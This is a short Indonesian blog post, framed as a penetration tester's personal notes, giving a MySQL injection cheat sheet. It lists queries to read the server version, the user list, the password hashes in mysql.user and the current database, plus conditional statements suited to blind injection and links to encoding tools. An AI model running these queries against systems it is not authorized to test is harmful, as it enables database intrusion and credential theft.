sqlinjection

MySQL Injection Cheat Sheet

Postingan ini saya buat sebagai catatan untuk saya sendiri dan di publish biar bisa berguna bagi semuanya.

Terkadang menggunakan tools untuk melakukan test security web (Sql Injection) sangat membantu dan mempercepat mendapakan hasilnya, namun ada dibeberapa kasus yang saya temukan dimana saya harus melakukan manual karena tidak dapat dilakukan jika menggunkan tools seperti Sqlmap, havij etc….

Check Version : SELECT @@version
List Users : SELECT user FROM mysql.user; 
List Password Hashes : SELECT host, user, password FROM mysql.user; 
Current Database : SELECT database();
Case Statement : SELECT CASE WHEN (1337!=31337) THEN 'H' ELSE 'I' END;# returns H
If Statement : SELECT if(1337=1337,'pentester','notpentester')
Hex to String : http://string-functions.com/hex-string.aspx
String to Hex : http://string-functions.com/string-hex.aspx
Base64 Decoder : https://codebeautify.org/base64-decode
Base64 Encoder : https://codebeautify.org/base64-encode
0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your e-mail address will not be published. Required fields are marked *

*